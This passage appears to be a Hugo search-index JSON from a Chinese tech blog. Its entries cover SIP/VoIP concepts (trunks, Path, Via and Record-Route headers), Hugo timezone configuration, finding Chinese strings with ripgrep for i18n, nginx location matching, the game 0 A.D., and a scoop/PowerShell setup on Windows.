节约话费成本:企业可以通过设置目的地址任意选择并连接到多个ITSP,充分利用遍布全球各地的ITSP,节省通话费用。 功能强大:部署SIP Trunk设备后,全网可以使用SIP协议,可以更好的支持语音、会议、即时消息等IP通信业务。 处理信令和媒体:SIP Trunk设备不同于SIP代理服务器。SIP Trunk设备接收到用户的呼叫请求后,会代表用户向ITSP发起新呼叫请求。在转发过程中,SIP Trunk设备不但要对信令消息进行中继转发,对RTP媒体消息也需要进行中继转发。在整个过程中,SIP Trunk设备两端的设备(企业内部和企业外部设备)均认为和其交互的是SIP Trunk设备本身。 参考 http://www.h3c.com/cn/d_201009/688762_30003_0.htm https://getvoip.com/blog/2013/01/24/differences-between-sip-trunking-and-hosted-pbx/ https://www.onsip.com/blog/hosted-pbx-vs-sip-trunking https://baike.baidu.com/item/sip%20trunk/1499860 ","permalink":"https://wdd.js.org/opensips/ch1/trunk-pbx-gateway/","summary":"传统中继 sip trunk中继 安全可靠:SIP Trunk设备和ITSP之间只需建立唯一的、安全的、具有QoS保证的SIP Trunk链路。通过该链路来承载企业的多路并发呼叫,运营商只需对该链路进行鉴权,不再对承载于该链路上的每一路SIP呼叫进行鉴权。 节约硬件成本:企业内部通信由企业IP-PBX负责。企业所有外出通信都通过SIP Trunk交由ITSP,再由ITSP中的设备发送到PSTN网络,企业不再需要维护原有的传统PSTN中继链路,节省了硬件和维护成本。 节约话费成本:企业可以通过设置目的地址任意选择并连接到多个ITSP,充分利用遍布全球各地的ITSP,节省通话费用。 功能强大:部署SIP Trunk设备后,全网可以使用SIP协议,可以更好的支持语音、会议、即时消息等IP通信业务。 处理信令和媒体:SIP Trunk设备不同于SIP代理服务器。SIP Trunk设备接收到用户的呼叫请求后,会代表用户向ITSP发起新呼叫请求。在转发过程中,SIP Trunk设备不但要对信令消息进行中继转发,对RTP媒体消息也需要进行中继转发。在整个过程中,SIP Trunk设备两端的设备(企业内部和企业外部设备)均认为和其交互的是SIP Trunk设备本身。 参考 http://www.h3c.com/cn/d_201009/688762_30003_0.htm https://getvoip.com/blog/2013/01/24/differences-between-sip-trunking-and-hosted-pbx/ https://www.onsip.com/blog/hosted-pbx-vs-sip-trunking https://baike.baidu.com/item/sip%20trunk/1499860 ","title":"Trunk Pbx Gateway"},{"content":"RFC3261并没有介绍关于Path头的定义,因为这个头是在RFC3327中定义的,Path头作为一个SIP的扩展头。\nRFC3327的标题是:Session Initiation Protocol (SIP) Extension Header Field for Registering Non-Adjacent Contacts。\n从这个标题可以看出,Path头是作为Register请求的一个消息头,一般这个头只在注册消息上才有。\n这个头的格式如下。\nPath: \u0026lt;sip:P1.EXAMPLEVISITED.COM;lr\u0026gt; 从功能上说,Path头和record-route头的功能非常相似,但是也不同。\n看下面的一个场景,uac通过p1和p2, 将注册请求发送到uas, 在某一时刻,uac作为被叫,INVITE请求要从uas发送到uac, 这时候,INVITE请求应该怎么走?\n假如我们希望INVITE请求要经过p2,p2,然后再发送到uac, Path头的作用就是这个。\n注册请求经过P1时,P1在注册消息上加上p1地址的path头 注册请求经过P2时,P2在注册消息上加上p2地址的path头 注册请求到达uas时,uas从Contact头上获取到uac的地址信息,然后从两个Path头上获取到如下信息:如果要打电话给uac, Path头会转变为route头,用来定义INVITE请求的路径。 简单定义:Path头用来一般在注册消息里,Path头定义了uac作为被叫时,INVITE请求的发送路径。\n参考 ","permalink":"https://wdd.js.org/opensips/ch1/sip-path/","summary":"RFC3261并没有介绍关于Path头的定义,因为这个头是在RFC3327中定义的,Path头作为一个SIP的扩展头。\nRFC3327的标题是:Session Initiation Protocol (SIP) Extension Header Field for Registering Non-Adjacent Contacts。\n从这个标题可以看出,Path头是作为Register请求的一个消息头,一般这个头只在注册消息上才有。\n这个头的格式如下。\nPath: \u0026lt;sip:P1.EXAMPLEVISITED.COM;lr\u0026gt; 从功能上说,Path头和record-route头的功能非常相似,但是也不同。\n看下面的一个场景,uac通过p1和p2, 将注册请求发送到uas, 在某一时刻,uac作为被叫,INVITE请求要从uas发送到uac, 这时候,INVITE请求应该怎么走?\n假如我们希望INVITE请求要经过p2,p2,然后再发送到uac, Path头的作用就是这个。\n注册请求经过P1时,P1在注册消息上加上p1地址的path头 注册请求经过P2时,P2在注册消息上加上p2地址的path头 注册请求到达uas时,uas从Contact头上获取到uac的地址信息,然后从两个Path头上获取到如下信息:如果要打电话给uac, Path头会转变为route头,用来定义INVITE请求的路径。 简单定义:Path头用来一般在注册消息里,Path头定义了uac作为被叫时,INVITE请求的发送路径。\n参考 ","title":"Path头简史"},{"content":"写好了博客,但是没有在网页上渲染出来,岂不是很气人!\n我的archtypes/default.md配置如下\n--- title: \u0026#34;{{ replace .Name \u0026#34;-\u0026#34; \u0026#34; \u0026#34; | title }}\u0026#34; date: \u0026#34;{{ now.Format \u0026#34;2006-01-02 15:04:05\u0026#34; }}\u0026#34; draft: false --- 当使用 hugo new 创建一个文章的时候,有如下的头\n--- title: \u0026#34;01: 学习建议\u0026#34; date: \u0026#34;2022-09-03 10:23:10\u0026#34; draft: false --- Hugo 默认采用的是 格林尼治平时 (GMT),比北京时间 (UTC+8) 晚了 8 个小时,Hugo 在生成静态页面的时候,不会生成超过当前时间的文章。\n如果把北京时间当作格林尼治时间来计算,那么肯定还没有超过当前时间。\n所以我们要给站点设置时区。\n在config.yaml增加如下内容\ntimeZone: \u0026#34;Asia/Shanghai\u0026#34; ","permalink":"https://wdd.js.org/posts/2022/09/hugo-timezone/","summary":"写好了博客,但是没有在网页上渲染出来,岂不是很气人!\n我的archtypes/default.md配置如下\n--- title: \u0026#34;{{ replace .Name \u0026#34;-\u0026#34; \u0026#34; \u0026#34; | title }}\u0026#34; date: \u0026#34;{{ now.Format \u0026#34;2006-01-02 15:04:05\u0026#34; }}\u0026#34; draft: false --- 当使用 hugo new 创建一个文章的时候,有如下的头\n--- title: \u0026#34;01: 学习建议\u0026#34; date: \u0026#34;2022-09-03 10:23:10\u0026#34; draft: false --- Hugo 默认采用的是 格林尼治平时 (GMT),比北京时间 (UTC+8) 晚了 8 个小时,Hugo 在生成静态页面的时候,不会生成超过当前时间的文章。\n如果把北京时间当作格林尼治时间来计算,那么肯定还没有超过当前时间。\n所以我们要给站点设置时区。\n在config.yaml增加如下内容\ntimeZone: \u0026#34;Asia/Shanghai\u0026#34; ","title":"Hugo Timezone没有设置, 导致页面无法渲染"},{"content":" sequenceDiagram title French Words I Know autonumber participant a participant p1 participant p2 participant p3 participant b a-\u003e\u003ep1 : INVITE route: p1, via: a p1-\u003e\u003ep2: INVITE via: a,p1, rr: p1 p2-\u003e\u003ep3: INVITE via: a,p1,p2 rr: p1,p2 p3-\u003e\u003eb: INVITE via: a,p1,p2,p3 rr: p1,p2,p3 b--\u003e\u003ep3: 180 via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 180 via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 180 via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 180 via: a rr: p1,p2,p3 b--\u003e\u003ep3: 200 OK via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 200 Ok via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 200 Ok via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 200 Ok via: a rr: p1,p2,p3 a-\u003e\u003ep1 : ACK via: a, route: p1,p2,p3 p1-\u003e\u003ep2: ACK via: a,p1, route: p2,p3 p2-\u003e\u003ep3: ACK via: a,p1,p2 route: p3 p3-\u003e\u003eb: ACK via: a,p1,p2,p3 rr代表record-route头。\nTip Via 何时添加: 除了目的地外,请求从ua发出去时 何时删除: 除了目的地外,请求从ua发出去时 作用: 除了目的地外,请求从ua发出去时 Via的作用是让sip消息能够按照原路返回 比喻: 第一次离开家的人,只有每次经过一个地方,就记下地名。那么在回家的时候,他才能按照原来的路径返回。 Tip route 何时添加: 当请求从uac发出去时 何时删除: 请求离开ua时 作用: route的作用是指明下一站的目的地。虽然route请求是在请求发送出去时就添加,但是可以进添加一个。 比喻: 第一次离开家的人,可能并不知道如何到达海南,但是他知道如何到达自己的省会。这个省会就是sip终端配置的外呼代理。每次经过一个站点时,就把这个站点记录到record-route中。record-route会在180或者183,或200ok时,发送给主叫的话机。 Tip record-route 何时添加: 当请求从uas发出去时 何时删除: 为dialog中的后续请求,指明到达目的地的路径 作用: 为dialog中的后续请求,指明到达目的地的路径 比喻: 当一个uac收到180之后,这个180中带有了record-route,例如p1,p2,p3。那么后续的ACK请求,就可以理由record-route来生成route: p1, p2, p3。 Address-of-Record: An address-of-record (AOR) is a SIP or SIPS URI that points to a domain with a location service that can map the URI to another URI where the user might be available. Typically, the location service is populated through registrations. An AOR is frequently thought of as the \u0026ldquo;public address\u0026rdquo; of the user. \u0026ndash; rfc3261\nThe difference between a contact address and an address-of-record is like the difference between a device and its user. While there is no formal distinction in the syntax of these two forms of addresses, contact addresses are associated with a particular device, and may have a very device-specific form (like sip:10.0.0.1, or sip:edgar@ua21.example.com). An address-of-record, however, represents an identity of the user, generally a long-term identity, and it does not have a dependency on any device; users can move between devices or even be associated with multiple devices at one time while retaining the same address-of-record. A simple URI, generally of the form \u0026lsquo;sip:egdar@example.com\u0026rsquo;, is used for an address-of-record. \u0026ndash;rfc3764\n1. Record-route写法 u1 -\u0026gt; p1 -\u0026gt; p2 -\u0026gt; p3 -\u0026gt; p4,\n最后经过的排在最上面或者最前面。\n多行写法\nINVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p4.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p3.middle.com\u0026gt; Record-Route: \u0026lt;sip:p2.example.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; Record-Route记录的是从主叫到被叫的过程,其中Record-Route的顺序非常重要。因为这个顺序会影响Route字段的顺序。\n因为loose_route是从最上面的route字段来决定下一条的地址。\n所以,对于主叫来说,route的顺序和Record-Router相反。对于被叫来说,route字段和Record-Route字段相同。\n对于某些使用不同协议对接的不同代理的时候,会一次性的增加两次Record-Route。\n例如下面的,AB直接是tcp的,BC之间是udp的。那么INVITE从A到C之后,会在最上面增加两个。 A \u0026ndash;tcp\u0026ndash; B \u0026ndash;udp\u0026ndash; C\nRecord-Route: \u0026lt;sip:B_ip;transport=udp\u0026gt; Record-Route: \u0026lt;sip:B_ip;transport=tcp\u0026gt; 单行写法\nINVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p4.domain.com;lr\u0026gt;,\u0026lt;sip:p3.middle.com\u0026gt;,\u0026lt;sip:p2.example.com;lr\u0026gt;,\u0026lt;sip:p1.example.com;lr\u0026gt; 2. Via 写法 最新的排在最上面 ","permalink":"https://wdd.js.org/opensips/ch1/via-route-record-route/","summary":"sequenceDiagram title French Words I Know autonumber participant a participant p1 participant p2 participant p3 participant b a-\u003e\u003ep1 : INVITE route: p1, via: a p1-\u003e\u003ep2: INVITE via: a,p1, rr: p1 p2-\u003e\u003ep3: INVITE via: a,p1,p2 rr: p1,p2 p3-\u003e\u003eb: INVITE via: a,p1,p2,p3 rr: p1,p2,p3 b--\u003e\u003ep3: 180 via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 180 via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 180 via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 180 via: a rr: p1,p2,p3 b--\u003e\u003ep3: 200 OK via: a,p1,p2,p3 rr: p1,p2,p3 p3--\u003e\u003ep2: 200 Ok via: a,p1,p2 rr: p1,p2,p3 p2--\u003e\u003ep1: 200 Ok via: a,p1 rr: p1,p2,p3 p1--\u003e\u003ea: 200 Ok via: a rr: p1,p2,p3 a-\u003e\u003ep1 : ACK via: a, route: p1,p2,p3 p1-\u003e\u003ep2: ACK via: a,p1, route: p2,p3 p2-\u003e\u003ep3: ACK via: a,p1,p2 route: p3 p3-\u003e\u003eb: ACK via: a,p1,p2,p3 rr代表record-route头。","title":"Via route Record-Route的区别"},{"content":"SIP是VoIP的基石,相当于HTTP协议在Web服务器里的角色。如果你熟悉HTTP协议,那么你可以在SIP协议中找到许多和HTTP中熟悉的东西,例如请求头,请求体,响应码之类概念,这是因为SIP协议的设计,很大程度上参考了HTTP协议。\n如果想要学习VoIP,那么SIP协议是你务必掌握敲门砖。\n1. SIP组件 UAC: 例如sip终端,软电话,话机 UAS: sip服务器 UA: ua既可以当做uac也可以当做uas 代理服务器 重定向服务器 注册服务器 网关 PSTN 公共交换电话网 2. SBC 边界会话控制器 SBC是Session Border Controller的缩写,具有一下几个功能。\n拓扑隐藏:隐藏所有内部网络的信息。 媒体流管理:设置语音流编码规则,转换等 增加能力:例如Refer, 3CPP 维护NAT映射: 访问控制 媒体加密:例如外部网络用SRTP, 内部网络用RTP 3. sip注册过程 下面简化注册逻辑,省略了验证和过期等字段:\n对于分机来说,注册服务器的地址是需要设置的 分机向注册服务器发请求,说:你好,注册服务器,我是8005,我的地址是200.180.1.1,以后你可以用这个地址联系我。 注册服务器回复:好的,注册成功 4. sip服务器的类型 4.1. 代理服务器 4.2. 重定向服务器 4.3. 背靠背UA服务器 背靠背UA服务器有两个作用\n隐藏网络拓扑结构 有些时候,路由无法到达,只能用背靠背UA服务器 5. 常用sip请求方法 比较常用的是下面的\n常用的几个是:register, invite, ack, bye, cancel。除了cancel和ack不需要认证外,其余的请求都需要认证。 register自不必说,invite和bye是需要认证的。\n对于我们不信任的ua,我们不允许他们呼叫。对于未认证的bye,也需要禁止。后者可以防止恶意的bye请求,挂断正常的呼叫。\ninvite除了re-invite的情况,其余的都属于初始化请求,需要着重关心的。而对于bye这种序列化请求,只需要按照record-route去路由。\n6. sip响应状态码 7. sip对话流程图 从上图可以看出,从invite请求到200ok之间的信令,都经过了代理服务器。但是200ok之后的ack,确没有经过代理服务器,如果想要所有信令都经过代理服务器,需要在sip消息头record-routing 指定代理服务器的地址\n8. 请求与响应报文 9. 事务与对话的区别 重点:\n从INVITE请求到最终的响应(注意1xx不是最终响应,非1xx的都是最终响应)之间,称为事务。一个事务可以带有多个消息组成,并经过多个ua。 ack请求比较特殊,但是ack不是事务。如果被叫接通后,超时未收到主叫方的ack, 会怎样?是否会再次发送200OK tcp三次握手建立连接,sip:invite-\u0026gt;200ok-\u0026gt;ack,可以理解为三次握手建立对话。 bye请求和200ok算作一个事务 dialog建立的前提是呼叫接通,如果呼叫没有接通,则没有dialog。 dialog可以由三个元素唯一确定。callId, from字段中的tag, to字段中的tag。 10. sip底层协议 SIP协议的结构 SIP协议是一个分层的协议,意味着各层之间是相互独立的\n最底层:SIP编码的语法 BNF语法 第二层:传输层 传输层定义如何接收和发送消息,SIP常用的传输层可以是udp, tcp, websocket等等 第三层:事务层 事务是一个请求和最终的响应称为一个事务,例如invite, 200ok是一个事务 第四层:事务用户层 所有的SIP实体,除了无状态的代理,都称为事务用户层。常见的uac, uas都是事务用户层 11. voip总体架构 12. 参考 ","permalink":"https://wdd.js.org/opensips/ch1/sip-overview/","summary":"SIP是VoIP的基石,相当于HTTP协议在Web服务器里的角色。如果你熟悉HTTP协议,那么你可以在SIP协议中找到许多和HTTP中熟悉的东西,例如请求头,请求体,响应码之类概念,这是因为SIP协议的设计,很大程度上参考了HTTP协议。\n如果想要学习VoIP,那么SIP协议是你务必掌握敲门砖。\n1. SIP组件 UAC: 例如sip终端,软电话,话机 UAS: sip服务器 UA: ua既可以当做uac也可以当做uas 代理服务器 重定向服务器 注册服务器 网关 PSTN 公共交换电话网 2. SBC 边界会话控制器 SBC是Session Border Controller的缩写,具有一下几个功能。\n拓扑隐藏:隐藏所有内部网络的信息。 媒体流管理:设置语音流编码规则,转换等 增加能力:例如Refer, 3CPP 维护NAT映射: 访问控制 媒体加密:例如外部网络用SRTP, 内部网络用RTP 3. sip注册过程 下面简化注册逻辑,省略了验证和过期等字段:\n对于分机来说,注册服务器的地址是需要设置的 分机向注册服务器发请求,说:你好,注册服务器,我是8005,我的地址是200.180.1.1,以后你可以用这个地址联系我。 注册服务器回复:好的,注册成功 4. sip服务器的类型 4.1. 代理服务器 4.2. 重定向服务器 4.3. 背靠背UA服务器 背靠背UA服务器有两个作用\n隐藏网络拓扑结构 有些时候,路由无法到达,只能用背靠背UA服务器 5. 常用sip请求方法 比较常用的是下面的\n常用的几个是:register, invite, ack, bye, cancel。除了cancel和ack不需要认证外,其余的请求都需要认证。 register自不必说,invite和bye是需要认证的。\n对于我们不信任的ua,我们不允许他们呼叫。对于未认证的bye,也需要禁止。后者可以防止恶意的bye请求,挂断正常的呼叫。\ninvite除了re-invite的情况,其余的都属于初始化请求,需要着重关心的。而对于bye这种序列化请求,只需要按照record-route去路由。\n6. sip响应状态码 7. sip对话流程图 从上图可以看出,从invite请求到200ok之间的信令,都经过了代理服务器。但是200ok之后的ack,确没有经过代理服务器,如果想要所有信令都经过代理服务器,需要在sip消息头record-routing 指定代理服务器的地址\n8. 请求与响应报文 9. 事务与对话的区别 重点:\n从INVITE请求到最终的响应(注意1xx不是最终响应,非1xx的都是最终响应)之间,称为事务。一个事务可以带有多个消息组成,并经过多个ua。 ack请求比较特殊,但是ack不是事务。如果被叫接通后,超时未收到主叫方的ack, 会怎样?是否会再次发送200OK tcp三次握手建立连接,sip:invite-\u0026gt;200ok-\u0026gt;ack,可以理解为三次握手建立对话。 bye请求和200ok算作一个事务 dialog建立的前提是呼叫接通,如果呼叫没有接通,则没有dialog。 dialog可以由三个元素唯一确定。callId, from字段中的tag, to字段中的tag。 10.","title":"SIP协议简介"},{"content":"1. 概念理解 务必要能理解SIP的重要概念,特别是事务、Dialog。参考https://www.yuque.com/wangdd/opensips/fx5pyy 概念是非常重要的东西,不理解概念,越学就会越吃力 2. 时序图 时序图是非常重要的,培训时,一般我会要求学员务必能够手工绘制时序图。因为只有能够手工绘制时序图了,在排查问题时,才能够从抓包工具给出的时序图中分析出问题所在。\nRFC3665 https://datatracker.ietf.org/doc/html/rfc3665 中提供了很多经典的时序图,建议可以去临摹。\n","permalink":"https://wdd.js.org/opensips/ch1/study-tips/","summary":"1. 概念理解 务必要能理解SIP的重要概念,特别是事务、Dialog。参考https://www.yuque.com/wangdd/opensips/fx5pyy 概念是非常重要的东西,不理解概念,越学就会越吃力 2. 时序图 时序图是非常重要的,培训时,一般我会要求学员务必能够手工绘制时序图。因为只有能够手工绘制时序图了,在排查问题时,才能够从抓包工具给出的时序图中分析出问题所在。\nRFC3665 https://datatracker.ietf.org/doc/html/rfc3665 中提供了很多经典的时序图,建议可以去临摹。","title":"学习建议"},{"content":" 书名 Packet Guide to Voip over IP 作者 Bruce Hartpence 状态 已读完 简介 Go under the hood of an operating Voice over IP network, and build your knowledge of protocol \u0026hellip;. 读后感 新技术出现的时机 Pulling the trigger early might put you at risk of making the wrong decision in terms of vendor or protocol. Adopting late might put you behind the competition or make you rush to deploy a system that is not well understood by the local staff.\n技术应用出现的太早则会承受巨大的风险,出现的太晚则失去竞争力。\n两种SIP信令 VoIP protocols are broken into two categories: signaling and transport.\nVoIP的信令可以分为两类,传输信令 与 传输媒体\n美梦与噩梦 It was a golden dream for some (consumers) and a nightmare for others; namely, the providers.\n新技术的出现,对开拓者来说是黄金美梦,对守旧者来说,则是噩梦。\n出局 Some of these services offered calling plans for less than half the price of traditional carriers. Some of them, most notably Skype, had as one of their goals putting telephone companies out of business\nUDP的另一种理解 In fact,UDP is sometimes considered a fire-and-forget protocol because once the packet leaves the sender, we think nothing more about it.\nUDP可以理解成一种一旦发送,则忘记的协议。\n","permalink":"https://wdd.js.org/posts/2022/07/vl3zhk/","summary":"书名 Packet Guide to Voip over IP 作者 Bruce Hartpence 状态 已读完 简介 Go under the hood of an operating Voice over IP network, and build your knowledge of protocol \u0026hellip;. 读后感 新技术出现的时机 Pulling the trigger early might put you at risk of making the wrong decision in terms of vendor or protocol. Adopting late might put you behind the competition or make you rush to deploy a system that is not well understood by the local staff.","title":"读书笔记 - Packet Guide to VoIP"},{"content":"1. 前提说明 项目已经处于维护期 项目一开始并没有考虑多语言,所以很多地方都是写死的中文 现在要给这个项目添加多语言适配 2. 工具选择 https://www.npmjs.com/package/i18n https://www.npmjs.com/package/vue-i18n 3. 难点 项目很大,中文可能存在于各种文件中,例如html, vue, js, typescript等等, 人工查找不现实 所以首先第一步是要找出所有的中文语句 4. 让文本飞 安装ripgrep apt-get instal ripgrep 搜索所有包含中文的代码: rg -e '[\\p{Han}]' \u0026gt; han.all.md 给所有包含中文的代码,按照文件名,和出现的次数排序: cat han.all.md | awk -F: '{print $1}' | uniq -c | sort -nr \u0026gt; stat.han.md 这一步主要是看看哪些文件包含的中文比较多 按照中文的语句,排序并统计出现的次数: cat han.all.md |rg -o -e '([\\p{Han}]+)' | sort | uniq -c | sort -nr \u0026gt; word.han.md 经过上面4步,基本上可以定位出哪些代码中包含中文,中文的语句有哪些。\n","permalink":"https://wdd.js.org/posts/2022/07/mv0hk1/","summary":"1. 前提说明 项目已经处于维护期 项目一开始并没有考虑多语言,所以很多地方都是写死的中文 现在要给这个项目添加多语言适配 2. 工具选择 https://www.npmjs.com/package/i18n https://www.npmjs.com/package/vue-i18n 3. 难点 项目很大,中文可能存在于各种文件中,例如html, vue, js, typescript等等, 人工查找不现实 所以首先第一步是要找出所有的中文语句 4. 让文本飞 安装ripgrep apt-get instal ripgrep 搜索所有包含中文的代码: rg -e '[\\p{Han}]' \u0026gt; han.all.md 给所有包含中文的代码,按照文件名,和出现的次数排序: cat han.all.md | awk -F: '{print $1}' | uniq -c | sort -nr \u0026gt; stat.han.md 这一步主要是看看哪些文件包含的中文比较多 按照中文的语句,排序并统计出现的次数: cat han.all.md |rg -o -e '([\\p{Han}]+)' | sort | uniq -c | sort -nr \u0026gt; word.han.md 经过上面4步,基本上可以定位出哪些代码中包含中文,中文的语句有哪些。","title":"中途多语言适配"},{"content":" 1. 我为什么会知道0 A.D. 这款游戏? 最近切换到windows开发,用了scoop这个包管理工具来安装软件,随便逛逛的时候,发现scoop还可以用来安装游戏,然后我就在里面看了一下,然后排名第一的是一个名叫 0 A.D.的游戏,然后我就安装,并试玩了一下。\n2. 0 A.D. 这个名字是啥意思? 基督教称耶稣诞生的那年为公元元年, A.D. 就是Anno Domini(A.D.)(拉丁)的缩写,对应的公元前就是而在耶稣诞生之前,称为B.C. Before Christ(B.C.).\n我们现在的阳历,例如今年是2022年,这其实就是公元2022年。对应的公元元年,对中国来说,大致在西汉年间。\n所以 0 A.D. 其实的意思就是一个不存在的元年。\n“0 A.D.” is a time period that never actually existed:\n3. 0 A.D. 是什么类型的游戏? 如果你玩过红警,0 A.D.的有点像红警。 官方的介绍0AD是一个基于历史的实时策略游戏。 如果你玩过部落冲突,0AD其实也有点类似部落冲突。\n4. 0 A.D. 有什么特点? 跨平台, windows, mac, linux都可以玩 免费 历史悠久,项目开始于2001 还处于开发阶段 可玩性还不错 基于真实历史,所以玩游戏的时候,也是能够学点历史的。里面有是14个文明。 5. 有哪些玩法 单机和AI对战 在线组队玩 6. FAQ 如何设置中文界面 默认的游戏不带中文语言的,实际上它是有中文的语言包的,可以参考 参考 https://baike.baidu.com/item/%E5%85%AC%E5%85%83/17855 ","permalink":"https://wdd.js.org/posts/2022/07/gxog1n/","summary":" 1. 我为什么会知道0 A.D. 这款游戏? 最近切换到windows开发,用了scoop这个包管理工具来安装软件,随便逛逛的时候,发现scoop还可以用来安装游戏,然后我就在里面看了一下,然后排名第一的是一个名叫 0 A.D.的游戏,然后我就安装,并试玩了一下。\n2. 0 A.D. 这个名字是啥意思? 基督教称耶稣诞生的那年为公元元年, A.D. 就是Anno Domini(A.D.)(拉丁)的缩写,对应的公元前就是而在耶稣诞生之前,称为B.C. Before Christ(B.C.).\n我们现在的阳历,例如今年是2022年,这其实就是公元2022年。对应的公元元年,对中国来说,大致在西汉年间。\n所以 0 A.D. 其实的意思就是一个不存在的元年。\n“0 A.D.” is a time period that never actually existed:\n3. 0 A.D. 是什么类型的游戏? 如果你玩过红警,0 A.D.的有点像红警。 官方的介绍0AD是一个基于历史的实时策略游戏。 如果你玩过部落冲突,0AD其实也有点类似部落冲突。\n4. 0 A.D. 有什么特点? 跨平台, windows, mac, linux都可以玩 免费 历史悠久,项目开始于2001 还处于开发阶段 可玩性还不错 基于真实历史,所以玩游戏的时候,也是能够学点历史的。里面有是14个文明。 5. 有哪些玩法 单机和AI对战 在线组队玩 6. FAQ 如何设置中文界面 默认的游戏不带中文语言的,实际上它是有中文的语言包的,可以参考 参考 https://baike.baidu.com/item/%E5%85%AC%E5%85%83/17855 ","title":"0 A.D. 一款开发了21年还未release的游戏"},{"content":"HTTP URL的格式复习 ://:@:/;?#frag\nscheme 协议, 常见的有http, https, file, ftp等 : 用户名和密码 host 主机或者IP port 端口号 path 路径 params 参数 用的比较少 query 查询参数 frag 片段,资源的一部分,浏览器不会把这部分发给服务端 关于frag片段 浏览器加载一个网页,网页可能有很多章节的内容,frag片段可以告诉浏览器,应该将某个特定的点显示在浏览器中。\n例如 https://github.com/wangduanduan/jsplumb-chinese-tutorial/blob/master/api/anchors.js#L18\n这里的#L8就是一个frag片段, 当浏览器打开这个页面的时,就会跳到对应的行\n在网络面板,也可以看到,实际上浏览器发出的请求,也没有带有frag参数\nVue 在Vue中,默认的路由就是这种frag片段。 这种路由只对浏览器有效,并不会发送到服务端。\n所以在一个单页应用中,服务端是无法根据URL知道用户访问的是什么页面的。\n所以实际上nginx无法根据frag片段进行拦截。\nnginx路径拦截 location [modifier] [URI] { ... ... } modifier\n= 完全匹配 ^~ 正则匹配,并且必须是以特定的URL开头 ~ 正则匹配,且大小写敏感 ~* 正则匹配,大小写不敏感 nginx路径匹配规则\n首先使完全匹配,一旦匹配,则匹配结束,进行后续数据处理 完全匹配无法找到,则进行最长URL匹配,类似 ^~ 最长匹配找不到,则按照 ~或者~*的方式匹配 最后按照 / 的默认匹配 ","permalink":"https://wdd.js.org/posts/2022/07/gt6a84/","summary":"HTTP URL的格式复习 ://:@:/;?#frag\nscheme 协议, 常见的有http, https, file, ftp等 : 用户名和密码 host 主机或者IP port 端口号 path 路径 params 参数 用的比较少 query 查询参数 frag 片段,资源的一部分,浏览器不会把这部分发给服务端 关于frag片段 浏览器加载一个网页,网页可能有很多章节的内容,frag片段可以告诉浏览器,应该将某个特定的点显示在浏览器中。\n例如 https://github.com/wangduanduan/jsplumb-chinese-tutorial/blob/master/api/anchors.js#L18\n这里的#L8就是一个frag片段, 当浏览器打开这个页面的时,就会跳到对应的行\n在网络面板,也可以看到,实际上浏览器发出的请求,也没有带有frag参数\nVue 在Vue中,默认的路由就是这种frag片段。 这种路由只对浏览器有效,并不会发送到服务端。\n所以在一个单页应用中,服务端是无法根据URL知道用户访问的是什么页面的。\n所以实际上nginx无法根据frag片段进行拦截。\nnginx路径拦截 location [modifier] [URI] { ... ... } modifier\n= 完全匹配 ^~ 正则匹配,并且必须是以特定的URL开头 ~ 正则匹配,且大小写敏感 ~* 正则匹配,大小写不敏感 nginx路径匹配规则\n首先使完全匹配,一旦匹配,则匹配结束,进行后续数据处理 完全匹配无法找到,则进行最长URL匹配,类似 ^~ 最长匹配找不到,则按照 ~或者~*的方式匹配 最后按照 / 的默认匹配 ","title":"请问nginx 能否根据 frag 片段 进行路径转发?"},{"content":"我已经有5年没有用过windows了,再次在windows上搞开发,发现了windows对于开发者来说,友好了不少。\n首先是windows terminal, 这个终端做的还不错。\n其次是一些常用的命令,比如说ssh, scp等,都已经默认附带了,不用再安装。\n还有包管理工具scoop, 命令行提示工具 oh-my-posh, 以及powershell 7 加载一起,基本可以迁移80%左右的linux上的开发环境。\n特别要说明一下scoop, 这个包管理工具,我安装了在linux上常用的一些软件。\n包括有以下的软件,而且软件的版本都还蛮新的。\n0ad 0.0.25b games 7zip 22.00 main curl 7.84.0_4 main curlie 1.6.9 main diff-so-fancy 1.4.3 main duf 0.8.1 main everything gawk 5.1.1 main git 2.37.0.windows.1 main git-aliases 0.3.5 extras git-chglog 0.15.1 main gzip 1.3.12 main hostctl 1.1.2 main hugo 0.101.0 main jq 1.6 main klogg 22.06.0.1289 extras make 4.3 main neofetch 7.1.0 main neovim 0.7.2 main netcat 1.12 main nodejs-lts 16.16.0 main ntop 0.3.4 main procs 0.12.3 main ripgrep 13.0.0 main sudo 0.2020.01.26 main tar 1.23 main 另外一个就是powershell 7了,贴下我的profile配置。\n智能提示,readline都有了\noh-my-posh init pwsh --config ~/default.omp.json | Invoke-Expression Import-Module PSReadLine New-Alias -Name ll -Value ls if ($host.Name -eq \u0026#39;ConsoleHost\u0026#39;) { Import-Module PSReadLine Set-PSReadLineOption -EditMode Emacs } ","permalink":"https://wdd.js.org/posts/2022/07/crofgr/","summary":"我已经有5年没有用过windows了,再次在windows上搞开发,发现了windows对于开发者来说,友好了不少。\n首先是windows terminal, 这个终端做的还不错。\n其次是一些常用的命令,比如说ssh, scp等,都已经默认附带了,不用再安装。\n还有包管理工具scoop, 命令行提示工具 oh-my-posh, 以及powershell 7 加载一起,基本可以迁移80%左右的linux上的开发环境。\n特别要说明一下scoop, 这个包管理工具,我安装了在linux上常用的一些软件。\n包括有以下的软件,而且软件的版本都还蛮新的。\n0ad 0.0.25b games 7zip 22.00 main curl 7.84.0_4 main curlie 1.6.9 main diff-so-fancy 1.4.3 main duf 0.8.1 main everything gawk 5.1.1 main git 2.37.0.windows.1 main git-aliases 0.3.5 extras git-chglog 0.15.1 main gzip 1.3.12 main hostctl 1.1.2 main hugo 0.101.0 main jq 1.6 main klogg 22.06.0.1289 extras make 4.3 main neofetch 7.1.0 main neovim 0.7.2 main 